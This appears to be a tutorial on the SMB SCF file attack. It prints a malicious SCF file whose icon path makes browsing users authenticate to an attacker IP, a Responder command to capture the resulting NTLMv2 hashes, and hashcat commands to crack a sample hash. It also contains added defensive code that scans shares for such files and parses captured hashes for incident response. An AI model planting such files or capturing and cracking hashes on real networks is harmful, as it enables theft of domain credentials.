# SMB SCF File Attacks

SMB is a widely used file sharing protocol. If a share allows writes by users who are not trusted (or anonymous writes are enabled), it is possible to obtain the password hashes of domain users who browse that share.
# SCF Files

SCF (Shell Command File) files can be used to make Windows access an arbitrary UNC path. UNC (Universal Naming Convention) is a standard for identifying servers, printers and other resources in a network; UNC paths use double backslashes (or double slashes) before the name of the computer.

The file below can be saved as "@helper.scf" (the @ sorts the file to the top of the share listing):
```ini
[Shell]
Command=2
IconFile=\\10.10.10.10\share\test.ico
[Taskbar]
Command=ToggleDesktop
```
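From the defender's side, the tell-tale sign of this technique is an SCF file on a writable share whose `IconFile` points at a UNC path on a host the share has no business talking to. The scanner below is an added example (not code from the original page): it parses the `[Section]` / `Key=Value` layout shown above, extracts the host from `IconFile`, and reports every `.scf` file that references a host outside an allow-list. The sample files, the temporary directory and the trusted host name `fileserver01` are constructed here purely for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample share contents for this example: one SCF file whose
# IconFile points at a remote UNC path (the pattern from the page), one
# legitimate "Show Desktop" SCF that uses a local icon resource, and an
# unrelated text file that the scanner must ignore.
SAMPLE_FILES = {
    "@helper.scf": (
        "[Shell]\n"
        "Command=2\n"
        r"IconFile=\\10.10.10.10\share\test.ico" "\n"
        "[Taskbar]\n"
        "Command=ToggleDesktop\n"
    ),
    "Show Desktop.scf": (
        "[Shell]\n"
        "Command=2\n"
        "IconFile=explorer.exe,3\n"
        "[Taskbar]\n"
        "Command=ToggleDesktop\n"
    ),
    "notes.txt": "nothing to see here\n",
}

# A UNC path starts with \\host\ or //host/; capture the host part.
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")


def parse_scf(text):
    """Parse the [Section] / Key=Value layout of an SCF file into a dict.

    Section and key names are lower-cased; a hand-rolled parser is used
    instead of configparser so that odd lines in the wild do not abort the scan.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def unc_host(path):
    """Return the host named in a UNC path, or None for local paths."""
    match = UNC_RE.match(path.strip())
    return match.group(1) if match else None


def scan_share(root, trusted_hosts=()):
    """Walk a share and report SCF files whose IconFile is a UNC path to an
    untrusted host. Returns a list of (path relative to root, host)."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() != ".scf":
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        icon = parse_scf(text).get("shell", {}).get("iconfile", "")
        host = unc_host(icon)
        if host and host.lower() not in trusted:
            findings.append((str(path.relative_to(root)), host))
    return findings


def scan_share_demo():
    """Write the constructed samples to a temp dir and scan it; 'fileserver01'
    is an assumed trusted host for the demonstration."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_FILES.items():
            (Path(tmp) / name).write_text(body)
        return scan_share(tmp, trusted_hosts=["fileserver01"])


if __name__ == "__main__":
    for rel_path, host in scan_share_demo():
        print(f"{rel_path}: IconFile references untrusted host {host}")
```

Run the scanner against the root of each writable share on a schedule (or from a file-change trigger) and alert on any finding; the same `unc_host` check is useful for `.url` and `.lnk` files, but this example deliberately stays with the SCF format the page describes.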
# Gathering hashes with Responder

When a user browses the share, their system automatically opens a connection to the UNC path contained in the SCF file. Windows tries to authenticate to that share with the user's username and password. During that authentication a random 8-byte challenge is sent from the server to the client, and the hashed NTLM/LANMAN password is encrypted again with this challenge. Responder captures the resulting NTLMv2 hash.

Start Responder:

```shell
sudo responder -wrf --lm -v -I tun0
```

Upload the .scf file and wait.
# Cracking NTLMv2 hashes

Save the captured hashes in a text file, identify the hash type with hashid, and crack it with hashcat:

```console
$ hashid -m hashes.txt
--File 'hashes.txt'--
Analyzing 'tony::DRIVER:e5114168b2dba372:3D9095E0C805BE0B85819511D3BDD0E9:01010000000000000618B47CF7BCD701B6DC2D25F02F783500000000020000000000000000000000'
[+] NetNTLMv2 [Hashcat Mode: 5600]
$ hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
```
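For an incident responder, a captured line like the one above is itself evidence: it names the coerced account and domain, carries the 8-byte server challenge described in the Responder section, and embeds a client timestamp that can be correlated with authentication logs to find the moment the SCF file was triggered. The parser below is an added example (not code from the original page) that splits the hashid line into its `user::domain:server challenge:NTProofStr:blob` fields and decodes the NTLMv2 blob (response version, FILETIME timestamp, client challenge and AV pairs) following the MS-NLMP layout; the AV pair names are included for display only.

```python
import struct
from datetime import datetime, timedelta, timezone

# The NetNTLMv2 line from the page's hashid output, in the
# user::domain:server_challenge:NTProofStr:blob form hashcat mode 5600 expects.
SAMPLE_LINE = (
    "tony::DRIVER:e5114168b2dba372:3D9095E0C805BE0B85819511D3BDD0E9:"
    "01010000000000000618B47CF7BCD701B6DC2D25F02F783500000000020000000000000000000000"
)

# AV_PAIR ids from the NTLMv2 blob (MS-NLMP); names are for display only.
AV_NAMES = {
    1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
    4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
    9: "TargetName",
}
STRING_AVS = {1, 2, 3, 4, 5, 9}  # values stored as UTF-16LE strings


def filetime_to_datetime(filetime):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to a datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def parse_netntlmv2(line):
    """Split a NetNTLMv2 line and decode the fixed blob header plus AV pairs."""
    user, _unused, domain, challenge, ntproof, blob_hex = line.strip().split(":", 5)
    if len(challenge) != 16 or len(ntproof) != 32:
        raise ValueError("unexpected server challenge / NTProofStr length")
    blob = bytes.fromhex(blob_hex)
    if len(blob) < 28:
        raise ValueError("NTLMv2 blob too short")

    # Blob layout: 1 byte RespType, 1 byte HiRespType, 6 reserved,
    # 8 byte FILETIME, 8 byte client challenge, 4 reserved, then AV pairs.
    timestamp, = struct.unpack_from("<Q", blob, 8)
    av_pairs = {}
    off = 28
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        value = blob[off:off + av_len]
        off += av_len
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        av_pairs[name] = (value.decode("utf-16-le", errors="replace")
                          if av_id in STRING_AVS else value.hex())

    return {
        "user": user,
        "domain": domain,
        "server_challenge": challenge.lower(),   # the 8-byte challenge from the server
        "nt_proof": ntproof.lower(),
        "response_version": (blob[0], blob[1]),
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": blob[16:24].hex(),
        "av_pairs": av_pairs,
    }


if __name__ == "__main__":
    for key, value in parse_netntlmv2(SAMPLE_LINE).items():
        print(f"{key:>17}: {value}")
```

The decoded timestamp is the client's clock at the moment Windows answered the challenge, so it is the value to search for in the file server's and domain controller's logon events when reconstructing which host opened the share.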